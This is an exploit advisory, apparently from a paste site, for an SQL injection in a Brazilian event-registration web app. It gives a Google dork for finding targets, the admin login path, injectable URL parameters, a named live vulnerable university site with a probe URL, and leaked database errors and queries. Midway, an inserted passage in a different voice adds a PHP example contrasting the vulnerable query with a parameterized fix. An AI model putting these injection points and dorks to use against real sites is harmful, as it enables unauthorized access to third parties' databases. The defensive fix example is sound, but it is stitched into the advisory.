KingSkrupellos

SethComunicacao FreshDesk Brazil SQL Injection

Apr 24th, 2019
###################################################################

# Exploit Title : SethComunicacao FreshDesk Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 25/04/2019
# Vendor Homepages :
seth.freshdesk.com/support/home
sethcomunicacao.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : Faculdade Jesuíta Portal FAJE site:edu.br
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
SethComunicacao FreshDesk Brazil is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.

A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.

An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# Admin Panel Login Path :
************************
/webtop/login.php

# SQL Injection Exploit :
**********************
/eventos/cadastro/index.php?evento=[SQL Injection]

/eventos/index.php?%2520%2520pagina=grupo_conteudo&tela=[ID-NUMBER]&usuarioparoquia=&subtela=&evento=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] faculdadejesuita.edu.br/eventos/cadastro/index.php?evento=1%27

###################################################################

# Example SQL Database Error :
****************************
Erro no banco de dados You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, null given in
/home/fajee520/public_html/faculdadejesuita/eventos/cadastro/index.php on line 192

SELECT * FROM tbeve_hotsite WHERE evento_id = 1'

SELECT * FROM tbeve_rede where status = 1 AND evento_id = 1'

SELECT * FROM tbeve_contato2 WHERE evento_id = 1'

SELECT * FROM tbeve_participante_personalizacao where evento_id = 1'

SELECT * FROM tbeve_evento WHERE id = 1'

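As an added illustration (not code from the advisory or from the vendor), the concatenation pattern that produces the leaked queries above, next to a parameterized rewrite that a fix would use. Table and column names are taken from the error output; the connection details and the function names are assumed.

```php
<?php
// Added example, not the vendor's code: the query pattern behind the leaked
// "WHERE evento_id = 1'" statements, next to a parameterized version.
// Table and column names come from the advisory; connection details are assumed.

// Vulnerable pattern: the evento request parameter is concatenated into the SQL
// text, so evento=1' yields "... WHERE evento_id = 1'" and the syntax error shown.
// On PHP 7, mysqli_query() then returns false and mysqli_fetch_array() on that
// value emits a warning like the one quoted above, leaking the server-side path.
function loadHotsiteUnsafe(mysqli $conn, string $evento): ?array
{
    $sql = "SELECT * FROM tbeve_hotsite WHERE evento_id = " . $evento;
    $result = mysqli_query($conn, $sql);
    $row = mysqli_fetch_array($result, MYSQLI_ASSOC);
    return $row ?: null;
}

// Hardened pattern: validate the type first (evento_id is an integer in every
// leaked query), then pass the value as a bound parameter so the database never
// parses user input as part of the statement.
function loadHotsiteSafe(mysqli $conn, string $evento): ?array
{
    $id = filter_var($evento, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;           // "1'" is rejected here before any query runs
    }
    $stmt = mysqli_prepare($conn, 'SELECT * FROM tbeve_hotsite WHERE evento_id = ?');
    mysqli_stmt_bind_param($stmt, 'i', $id);
    mysqli_stmt_execute($stmt);
    $row = mysqli_fetch_assoc(mysqli_stmt_get_result($stmt));
    mysqli_stmt_close($stmt);
    return $row ?: null;
}

// Assumed connection details. Driver errors are raised as exceptions and
// display_errors is off, so a failure is logged server-side instead of
// echoing the SQL text and file path to the client as in the advisory.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
ini_set('display_errors', '0');
$conn = new mysqli('localhost', 'db_user', 'db_password', 'eventos');
$row = loadHotsiteSafe($conn, $_GET['evento'] ?? '');
```

The same change applies to each of the other four leaked queries, since all of them take evento_id from the same request parameter.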
###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################